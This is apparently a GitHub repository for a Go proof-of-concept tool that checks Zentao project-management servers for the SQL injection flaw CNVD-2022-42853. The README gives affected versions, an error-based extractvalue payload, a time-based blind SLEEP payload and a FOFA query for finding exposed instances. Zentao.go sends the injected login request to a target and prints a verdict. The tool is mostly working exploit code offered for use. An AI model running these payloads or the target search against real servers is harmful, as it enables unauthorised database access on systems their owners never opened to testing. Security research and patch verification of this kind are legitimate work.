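├── POC.png
├── README.md
├── Zentao.go
└── main.go


/POC.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/west9b/ZentaoSqli/e9fd6bba684dd7b4d6fb6f19074f646c5ec2b2d7/POC.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ZentaoSqli 禅道存在SQL注入漏洞 CNVD-2022-42853
2 |
3 | author:160team.west9B
4 |
5 | **仅限用于安全研究人员在授权的情况下使用,遵守网络安全法,产生任何问题,后果自负,与作者无关。**
6 |
7 | # 01-基本介绍
8 |
9 | 漏洞编号
10 |
11 | CNVD-2022-42853 公开日期:2022/6/14
12 |
13 | 影响产品
14 |
15 | 禅道企业版 6.5
16 |
17 | 禅道旗舰版 3.0
18 |
19 | 禅道开源版 16.5
20 |
21 | 禅道开源版 16.5.beta1
22 |
23 | # 02-使用说明
24 |
25 | ## usage: ./Zentao.exe -u url (加http://)
26 |
27 | 禅道当前数据库都是zentao,判断注入条件 extractvalue(1,concat(0x7e,(database()),0x7e) == zentao
28 |
29 | 盲注payload account=admin';SELECT SLEEP(5)#
30 |
31 | # Screenshots
32 | ![Image text](https://github.com/west9b/ZentaoSqli/blob/main/POC.png)
33 |
34 | # fofa
35 | app="易软天创-禅道系统"
36 |
37 |


--------------------------------------------------------------------------------
/Zentao.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | 	"crypto/tls"
5 | 	"fmt"
6 | 	"io"
7 | 	"io/ioutil"
8 | 	"net/http"
9 | 	"strings"
10 | 	"time"
11 | )
12 |
13 | // Zentao sends a single POST to url+Zentaopath whose account field carries the
14 | // extractvalue/concat(database()) probe, then prints a verdict based on whether
15 | // the response body contains "zentao". url and Zentaopath are package-level
16 | // variables declared in main.go.
17 | //
18 | // A request that cannot be built, sent or read is reported as undetermined and
19 | // is never counted as "not vulnerable".
20 | func Zentao() {
21 | 	// Upper bound on how much of the response is buffered in memory.
22 | 	const maxBody = 1 << 20
23 |
24 | 	fmt.Println("\n-----------------------✂---------------------------")
25 | 	fmt.Println("禅道 v16.5 SQL注入漏洞 公开日期:2022/6/14")
26 | 	fmt.Println("\n-----------------------✂---------------------------")
27 |
28 | 	// Certificate verification is switched off for this client, so the peer is
29 | 	// not authenticated and the verdict is only as trustworthy as the network path.
30 | 	tr := &http.Transport{
31 | 		TLSClientConfig: &tls.Config{
32 | 			InsecureSkipVerify: true,
33 | 		},
34 | 	}
35 | 	// The timeout bounds the whole exchange so an unresponsive host cannot hang the run.
36 | 	client := &http.Client{Transport: tr, Timeout: 10 * time.Second}
37 |
38 | 	req, err := http.NewRequest("POST", url+Zentaopath, strings.NewReader(
39 | 		`account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28database%28%29%29%2C0x7e%29%29%29%23`))
40 | 	if err != nil {
41 | 		// req is nil on error; the Header.Add calls below would dereference it.
42 | 		fmt.Println("请求构造失败,无法判断是否存在漏洞:", err)
43 | 		return
44 | 	}
45 | 	req.Header.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0")
46 | 	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
47 | 	req.Header.Add("Referer", url+Zentaopath)
48 |
49 | 	resp, err := client.Do(req)
50 | 	if err != nil {
51 | 		// A transport failure says nothing about the target's state.
52 | 		fmt.Println("请求失败,无法判断是否存在漏洞:", err)
53 | 		return
54 | 	}
55 | 	defer resp.Body.Close()
56 |
57 | 	body, err := ioutil.ReadAll(io.LimitReader(resp.Body, maxBody))
58 | 	if err != nil {
59 | 		fmt.Println("读取响应失败,无法判断是否存在漏洞:", err)
60 | 		return
61 | 	}
62 |
63 | 	// NOTE(review): the bare substring "zentao" is a loose signal. The request
64 | 	// path itself contains it, so a page that echoes the path or the product
65 | 	// name may also match. Confirm a positive (e.g. against the installed
66 | 	// version) before treating the host as affected.
67 | 	if strings.Contains(string(body), "zentao") {
68 | 		fmt.Println("存在禅道 v16.5 SQL注入漏洞")
69 | 	} else {
70 | 		fmt.Println("不存在禅道 v16.5 SQL注入漏洞")
71 | 	}
72 | }
73 |


--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | //author:160team.west9B
4 | import (
5 | 	"flag"
6 | 	"fmt"
7 | )
8 |
9 | var (
10 | 	// url is the target base URL taken from -u; the default "null" marks "not supplied".
11 | 	url string
12 | 	// Zentaopath is the login path appended to url for the request.
13 | 	Zentaopath = "/zentao/user-login.html"
14 | )
15 |
16 | // init registers the -u flag so that flag.Parse in main can fill url.
17 | func init() {
18 | 	flag.StringVar(&url,
19 | 		"u",
20 | 		"null",
21 | 		"url:http://127.0.0.1/",
22 | 	)
23 | }
24 |
25 | // main runs the check when -u was supplied and prints the usage line otherwise.
26 | func main() {
27 | 	flag.Parse()
28 | 	fmt.Println("author:160team.west9b")
29 | 	if url != "null" {
30 | 		Zentao()
31 | 		return
32 | 	}
33 | 	fmt.Println("usage_poc:./ZentaoSqli.exe -u url")
34 | }
35 |


--------------------------------------------------------------------------------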